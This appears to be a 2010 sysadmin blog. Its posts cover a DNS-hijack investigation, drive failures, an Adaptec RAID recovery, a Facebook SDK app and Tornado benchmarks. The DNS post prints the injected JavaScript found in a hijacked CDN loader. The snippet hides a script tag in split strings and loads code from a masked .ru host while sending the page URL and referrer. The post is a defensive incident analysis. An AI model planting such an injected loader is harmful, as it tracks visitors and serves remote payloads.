Man-in-the-Middle Attack

October 10th, 2010

A few days ago, a client had a window open up in his browser showing a bare IP address with his domain name passed as a query string parameter. He asked me if his WordPress site had been hacked. I took a look through the files on the disk, dumped the database and grepped it, and looked around the site using Chrome, Firefox and Safari, and saw nothing. I even used Firefox to view the generated source, since injected scripts sometimes exploit the fact that jQuery is already loaded to pull in an extra payload through a template or add-on.

Nothing. He runs a Mac, and his wife was having the same issue. I recalled the issue with the recent Adobe Flash plugin, but then he said something that was very confusing: their iPads were doing it too.

There's no Flash on the iPad, most toolbar malware can't be installed on the iPad due to its fairly tight sandbox, and the behavior was the same across multiple machines. Even machines that weren't accessing his site were popping up windows and tabs in Safari.

I had him check the DNS settings under System Preferences, TCP/IP, and read off the numbers. The last one, 1.1.1.1, seemed odd, but wouldn't normally cause an issue since 1.0.0.0/8 isn't routed. He read off the other two DNS server IPs and I wrote them down. A reverse IP lookup on each returned Not Found. Since he was on RoadRunner, I found that a bit odd, so I did a whois and found out that both of the IP addresses listed as DNS servers were hosted in Russia.
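
That reverse-lookup step is trivial to script. Here's a minimal sketch in Python; the addresses below are placeholders for the two servers he read off:

import socket

# Placeholders for the two DNS server addresses read off the client's machine.
SUSPECT_DNS = ["192.0.2.10", "192.0.2.11"]

for ip in SUSPECT_DNS:
    try:
        # A consumer ISP's resolvers normally have PTR records; these didn't.
        print("%s -> %s" % (ip, socket.gethostbyaddr(ip)[0]))
    except socket.herror:
        print("%s -> no reverse DNS entry" % ip)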

Now we're getting somewhere. The settings on his machine were grabbed from DHCP, which meant his router was probably set to hand out those servers. Sure enough, we logged in with the default username/password of admin/password, looked at the first page, and there they were. We changed them to Google's resolvers and changed the password on the router to something a little more secure.

We checked a few settings in the Linksys router, and remote web access wasn't enabled, so the only way it could have happened is a JavaScript exploit that logged into the router from inside the network and made the changes. Now the fun began: figuring out what was actually being intercepted. Since I had a source site that I knew caused issues, some quick investigative work turned up a number of external URLs loaded on his site that might be common enough and small enough to be of interest. Since we knew certain scripts require jQuery, we could look at anything in his source that called something external.

The first thought was the Twitter sidebar, but that calls Twitter directly, which means all of that traffic would have to be proxied; you certainly wouldn't want to do that with limited bandwidth. FeedBurner seemed like a potential vector, but it offers probably very limited access, and those were hrefs, so they would have had to be followed; besides, the FeedBurner widget wasn't present. bookmarklet.amplify.com seemed like a reasonable target, but the DNS for it was the same through the Russian DNS servers and other resolvers. That isn't to say they couldn't change answers on a per-request basis to balance traffic, but we went on the assumption that this was a fire-and-forget operation.

Looking further, StatCounter could have been a suspect, and it does fit the criteria of a small JavaScript file on a page likely to have jQuery, but again the DNS entries appeared to be the same.

The next entry, however, looked like a good candidate: cdn.wibiya.com, which requires jQuery and loads a small JavaScript file. Its DNS entries were different. We could attribute that to the fact that it is a CDN, but we got a CNAME from Google's resolvers and a bare A record from the suspect DNS servers.
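
Comparing answers across resolvers is also easy to script. A sketch using the dnspython package; the suspect resolver address is a placeholder, and HOSTS can be extended to sweep every external script a site loads:

import dns.resolver  # from the dnspython package

HOSTS = ["cdn.wibiya.com"]  # extend with any other externally loaded hosts
RESOLVERS = {"google": "8.8.8.8",
             "suspect": "192.0.2.53"}  # placeholder for the rogue server

for host in HOSTS:
    for label in sorted(RESOLVERS):
        r = dns.resolver.Resolver(configure=False)
        r.nameservers = [RESOLVERS[label]]
        answer = r.query(host, "A")  # renamed resolve() in dnspython >= 2.0
        print("%s via %s: %s" % (host, label,
                                 sorted(rr.to_text() for rr in answer)))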

The Loader.js contained a tiny bit of extra code at the bottom:

var xxxxxx_html = '';
    xxxxxx_html += '<scr ' + 'ipt language="JavaSc' + 'ript" ';
    xxxxxx_html += 'src="http://xx' + 'xxxx.ru/js.php?id=36274';
    xxxxxx_html += '&dd=3&url=' + encodeURIComponent(document.location);
    xxxxxx_html += '&ref=' + encodeURIComponent(document.referrer);
    xxxxxx_html += '&rnd=' + Math.random() + '"></scr>';
    document.write(xxxxxx_html);

I did a few checks to see if I could find any other hostnames they had filtered, but wasn't able to find anything at a quick glance. Note how the script tag is split across string concatenations, presumably to slip past naive content filters. Oh, and these guys minified the JavaScript, even though Wibiya didn't. And no, the server hosting the content was in the USA; only the DNS server was outside the USA.

After years of reading about this type of attack, this is the first time I was able to witness one first-hand.

Seagate Drive Fails right out of the shrink wrap

October 8th, 2010

We keep a number of drives on hand to replace failures. Yesterday, a drive started failing, as evidenced by the smartd logs and sudden load spikes on the machine for no apparent reason. Looking through the logs showed the drive being hard reset and reconnected.

So, we installed the following drive:

Model Family:     Seagate Barracuda 7200.10 family
Device Model:     ST3250820AS

Within 12 hours, the smartd log showed:

  7 Seek_Error_Rate         0x000f   085   062   030    Pre-fail  Always       -       352398337
  9 Power_On_Hours          0x0032   099   099   000    Old_age   Always       -       1545
195 Hardware_ECC_Recovered  0x001a   069   060   000    Old_age   Always       -       181870471

The drive was purchased from our supplier perhaps a year ago, when we bought a large batch of these in bulk. It was previously unopened, still in the original sealed static bag, and it already registered 1545 power-on hours. I trust our hardware supplier, as we've been buying from them for almost 11 years, but either they or Seagate rewrapped a used drive to make it appear new.
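
A quick acceptance check along these lines would catch a rewrapped drive before it goes into service. This is only a sketch: it assumes smartmontools is installed, and the device paths are hypothetical:

import re
import subprocess

DEVICES = ["/dev/sda", "/dev/sdb"]  # hypothetical: the drives just installed

for dev in DEVICES:
    out = subprocess.check_output(["smartctl", "-A", dev]).decode()
    m = re.search(r"Power_On_Hours.*?(\d+)\s*$", out, re.MULTILINE)
    if m and int(m.group(1)) > 24:
        # A factory-fresh drive should register essentially zero hours.
        print("%s claims to be new but has %s power-on hours" % (dev, m.group(1)))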

The drive that it replaced was an older Western Digital:

  9 Power_On_Hours          0x0032   060   060   000    Old_age   Always       -       29872
 12 Power_Cycle_Count       0x0032   100   100   000    Old_age   Always       -       39
199 UDMA_CRC_Error_Count    0x000a   200   253   000    Old_age   Always       -       53

Almost 30,000 hours, 39 power cycles. There's a reason we usually buy Western Digital.

Adaptec 31205 under Debian

September 25th, 2010

We have a storage server with eleven 2TB drives in a RAID 5. During a recent visit we heard the alarm, but no red light was visible on any drive, nor was the light on the front of the chassis lit. Knowing it was a problem waiting to happen, but without being able to see which drive had caused the array to fail, we scheduled a maintenance window that happened to coincide with a kernel upgrade.

In the meantime, we attempted to install the RPM and Java management system, to no avail, so we weren't able to read the controller status to find out what the problem was.

When we rebooted the machine, the array status was degraded, and it prompted us to hit Enter to accept the configuration or Ctrl-A to enter the admin. We entered the admin: Manage array, all drives present and working. Immediately the array status changed to rebuilding, with no indication of which drive had failed and was being re-added.

We exited the admin and saved the config, and the client said to pull the machine offline until it was fixed. This started what seemed like an endless process. We figured we would let it rebuild while it was online but disabled in the cluster. We installed a new kernel, 2.6.36-rc5, and rebooted, and this is where the trouble started. On boot, the new kernel got an I/O error, the channel hung, and the controller forced a reset and then sat there for about 45 seconds. After it continued, the kernel panicked because it was unable to read /dev/sda1.

Rebooting and entering the admin, we were faced with an array marked offline. After identifying each of the drives through Disk Utils to make sure they were recognized, we forced the array back online and rebooted into the old kernel. As it turns out, something in 2.6.36-rc5 disables the array and sets it offline. It took 18 hours to rebuild the array and return it to Optimal status.

After the machine came up, we knew we had a problem with one of the directories on the system, and this seemed like an opportune time to run xfs_repair. About 40 minutes in, we ran into an I/O error with a huge block number and, bam, the array was offline again.

Using Disk Utils in the controller's ROM, we started a test on the first drive. It took 5.5 hours to run through the first disk, which put us at an estimated 60+ hours to check all 11 drives in the array. smartctl couldn't check the drives independently through the controller, so we fired up a second machine and mounted each of the drives, looking for any telltale signs in the S.M.A.R.T. data stored on the drives. Two drives showed abnormal numbers, leaving an estimated 11 hours to check those two disks. 5.5 hours later the first disk came back clean; less than 30 minutes after that, we had our culprit. Relocating a number of bad sectors caused the controller to hang again, yet there was no red fault light anywhere to be seen and no indication in the Adaptec manager that this drive was bad.
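
Something like the following would do that sweep programmatically; it's an illustration rather than our exact procedure, and the device paths are assumptions:

import subprocess

# Counters whose raw values should be at or near zero on a healthy drive.
ATTRS = ("Reallocated_Sector_Ct", "Current_Pending_Sector",
         "Offline_Uncorrectable", "UDMA_CRC_Error_Count")

for dev in ["/dev/sdb", "/dev/sdc", "/dev/sdd"]:  # hypothetical paths
    out = subprocess.check_output(["smartctl", "-A", dev]).decode()
    for line in out.splitlines():
        fields = line.split()
        # Attribute rows: ID NAME FLAG VALUE WORST THRESH TYPE UPDATED
        # WHEN_FAILED RAW_VALUE
        if len(fields) == 10 and fields[1] in ATTRS and fields[9] != "0":
            print("%s: %s raw=%s" % (dev, fields[1], fields[9]))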

Replacing the drive and going back into the admin showed a greyed-out drive, which immediately started reconstructing. We rebooted the system into the older kernel and started xfs_repair again. After two hours it had run into a number of errors, but no I/O errors.

It was obvious we'd had some corruption for quite some time. We had a directory we couldn't delete because it claimed it had files, though no files were visible in it. We had two directories with files that we couldn't do anything with, and we couldn't even mv them to an area outside our working directories. We figured it was an XFS bug we had hit due to the 18-terabyte size of the partition, and guessed that an xfs_repair would fix it. It was a minor annoyance to the client until we could get to a maintenance interval, so we waited. In reality, this should have been a sign that we had issues, and we should have pushed the client harder to let us diagnose it much earlier. There is some data corruption, but this is the second of a pair of backup servers for their cluster; resyncing the data from a known good source will fix it without too much difficulty.

After four hours, xfs_repair was reporting issues like:

bad directory block magic # 0 in block 0 for directory inode 21491241467
corrupt block 0 in directory inode 21491241467
        will junk block
no . entry for directory 21491241467
no .. entry for directory 21491241467
problem with directory contents in inode 21491241467
cleared inode 21491241467
        - agno = 6
        - agno = 7
        - agno = 8
bad directory block magic # 0 in block 1947 for directory inode 34377945042
corrupt block 1947 in directory inode 34377945042
        will junk block
bad directory block magic # 0 in block 1129 for directory inode 34973370147
corrupt block 1129 in directory inode 34973370147
        will junk block
bad directory block magic # 0 in block 3175 for directory inode 34973370147
corrupt block 3175 in directory inode 34973370147
        will junk block

It appears that we have quite a bit of data corruption due to a bad drive, which is precisely the failure RAID is supposed to protect against.

The array failed, so why didn't the Adaptec on-board manager know which drive had failed? Even had we gotten the Java application to run, I'm still not convinced it would have told us which drive was throwing the array into degraded status. Obviously the card knew something was wrong, as the alarm was on. Each drive has a fault light and an activity light, yet all of the drives allowed the array to be rebuilt and the status to be claimed Optimal. During initialization, the Adaptec lights the fault and activity lights for each drive, so it seems reasonable that when a drive encountered errors, it could have lit that drive's fault light so we knew which one to replace. And when xfs_repair hit the I/O error on a block that couldn't be relocated, why didn't the Adaptec controller immediately fail the drive?

All in all, I'm not too happy with Adaptec right now. A 2TB hard drive failed, and it cost us roughly 60 hours to diagnose and put the machine back into service. The failing drive should have been flagged and removed from the RAID set immediately. As it is, even though the array was running in degraded mode, we shouldn't have seen any corruption; yet xfs_repair is finding a considerable number of errors.

The drives report roughly 5600 hours online, which corresponds to the eight months we've had the machine in service, and based on the number of bad files xfs_repair is finding, I believe that drive had been failing for quite some time. Adaptec has failed us; while we run a considerable number of Adaptec controllers, we've never seen a failure like this.

Facebook's JavaScript SDK and a short one-page application

September 16th, 2010

While discussing a project with a client, it occurred to me that perhaps you don't need anything complex to do something simple. Since using Facebook all but mandates that your visitor has JavaScript enabled, we should be able to write a very simple application that posts to someone's wall after asking for the 'publish' permission. After reading the documentation and looking through a few GitHub repositories, the solution turned out to be quite simple.

While this code doesn't use the non-blocking async method of loading the SDK, it is a good example. I've seen others use the inline publish, but for some reason I couldn't get it to consistently open a dialog box rather than a popup, which Chrome conveniently blocked. I also ran into an issue where Facebook appears to cache objects aggressively when they don't explicitly set an expiry time. While I find that acceptable for the application's long-term goals, it did make debugging a slightly frustrating experience.

To try the application, visit http://apps.facebook.com/onepageapp/. A direct link to the code is available at http://fbapp.cd34.com/opa/index.txt.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
        <title>One Page App</title>
    </head>
    <body>
<div id="fb-root"></div>
Thanks for clicking.  This is just a test to make sure that the application
works as expected.
<p>
You can skip posting to the wall if you would like.
<script src="http://connect.facebook.net/en_US/all.js"></script>
<script>
var appid = '154516391233318';
var name = 'One Page App';
var caption = 'A single page application designed to test whether it could be done';
var description = 'A quick page that allows you to post to someone\'s wall';
var href = 'http://apps.facebook.com/onepageapp/';
var user_message_prompt = 'Post a sample to your wall';
var message = 'Let\'s do a sample post to the wall.';
var action_text = 'Get the code';
var action_href = 'http://fbapp.cd34.com/opa/index.txt';

FB.init({appId  : appid, status : true, cookie : true, xfbml  : false });
FB.getLoginStatus(function(response) {
  if (response.session) {
    FB.ui(
      {
        method: 'stream.publish',
        display: 'dialog',
        message: message,
        attachment: {
          name: name,
          caption: caption,
          description: description,
          href: href
        },
        action_links: [
          { text: action_text, href: action_href }
        ],
        user_message_prompt: user_message_prompt
      },
      function(response) {
        self.location.href='/opa/thanks.html';
      }
    );
  } else {
    top.location.href='https://graph.facebook.com/oauth/authorize?client_id='+appid+'&redirect_uri='+href+'&display=page&scope=publish_stream';
  }
});
</script>
</body>
</html>

A weekend with Tornado

June 29th, 2010

After working on a Pylons project for a week or so, there was a minor part of it that I felt didn't need the complexity of a framework. Some quick benchmarking of the most minimal Pylons/SQLAlchemy project I could muster came in around 200 requests per second, which put me at roughly 12 million requests per day once adjusted for the typical daily traffic curve.

Within 15 minutes of installing Tornado and using its simple hello-world example, I imported SQLAlchemy and boosted this to 280 requests per second. As I really didn't need any of the ORM's features, I decided to use tornado.database, which isn't much more than a bare wrapper around python-mysql. Even with a single worker process, I was able to get 870 requests per second: 56 million requests per day, without any tuning.
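
For reference, the shape of the code being measured is roughly Tornado's stock hello-world plus a tornado.database query. This is a sketch against the Tornado 1.x API of the time; the connection parameters and the query are placeholders, not the actual benchmark code:

import tornado.database
import tornado.httpserver
import tornado.ioloop
import tornado.web

# tornado.database is a thin wrapper around MySQLdb; these connection
# parameters are placeholders.
db = tornado.database.Connection(
    host="127.0.0.1:3306", database="test", user="app", password="secret")

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        # One simple query per request; a stand-in for the real handler.
        row = db.get("SELECT COUNT(*) AS total FROM items")
        self.write("Hello, world: %d items" % row.total)

if __name__ == "__main__":
    application = tornado.web.Application([(r"/", MainHandler)])
    http_server = tornado.httpserver.HTTPServer(application)
    http_server.listen(8888)
    tornado.ioloop.IOLoop.instance().start()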

I'm reasonably impressed. Once I put it on production hardware, I'm thinking I can easily count on double those numbers, if not more.

Next weekend, Traffic Server.
